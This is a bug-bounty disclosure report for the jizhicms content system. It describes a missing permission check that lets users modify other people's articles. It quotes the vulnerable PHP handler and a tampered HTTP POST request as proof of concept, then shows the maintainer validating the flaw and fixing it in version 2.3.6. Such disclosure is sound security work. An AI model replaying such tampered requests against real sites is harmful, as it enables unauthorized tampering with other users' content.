Modify other people's articles by modifying the data package in cherry-toto/jizhicms

Valid

Reported on

Aug 8th 2022

Description

The program does not check whether the originator of the request has this permission. I can modify the content of other people's articles and even modify the content by capturing data packets, even if I am not the owner of the article, even if I do not have permission in this respect

Proof of Concept

$data = $this->frparam();
            $data = get_fields_data($data,'article');
            if(!$this->frparam('seo_title',1) && $this->frparam('config_seotitle')==1){
                $data['seo_title'] = $data['title'];
            }
            if(!$this->frparam('description',1) && $this->frparam('config_description')==1){
                $data['description'] = newstr(strip_tags($data['body']),200);
            }
            if(!$this->frparam('litpic',1) && $this->frparam('config_litpic')==1){
                $pattern='/<img.*?src="(.*?)".*?>/is';
                if(!$this->frparam('body',1)){
                    $r = preg_match($pattern,$_POST['body'],$matchContent);
                    if($r){
                        $data['litpic'] = $matchContent[1];
                    }else{
                        $data['litpic'] = '';
                    }

#EXP // PoC.js var payload = ...

OST /user/release.html HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 156
Origin: http://localhost
Connection: close
Referer: http://localhost/user/release.html
Cookie: PHPSESSID=pgbnunsra5bovtngp8g29ue7es

ajax=1&isshow=&molds=article&tid=1&title=test&keywords=jiafen&description=fefenef&litpic=&body=<p>wwwowota</p><p>woyaofen<br/></p>

Impact

The program does not check whether the initiator of the request has this permission. I can modify the content of other people's articles, or even the attribution, by capturing data packets

References

https://portswigger.net/web-security/access-control/security-models

We are processing your report and will contact the cherry-toto/jizhicms team within 24 hours. a year ago

A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago

We have contacted a member of the cherry-toto/jizhicms team and are waiting to hear back a year ago

留恋风 validated this vulnerability a year ago

Thank you for your report. I will fix it in the next version!

breakalegcml has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

We have sent a fix follow up to the cherry-toto/jizhicms team. We will try again in 7 days. a year ago

留恋风 marked this as fixed in 2.3.6 with commit e1abb4 a year ago

留恋风 has been awarded the fix bounty

This vulnerability will not receive a CVE

breakalegcml

commented a year ago

Researcher

Hello, could you please apply for CVE

to join this conversation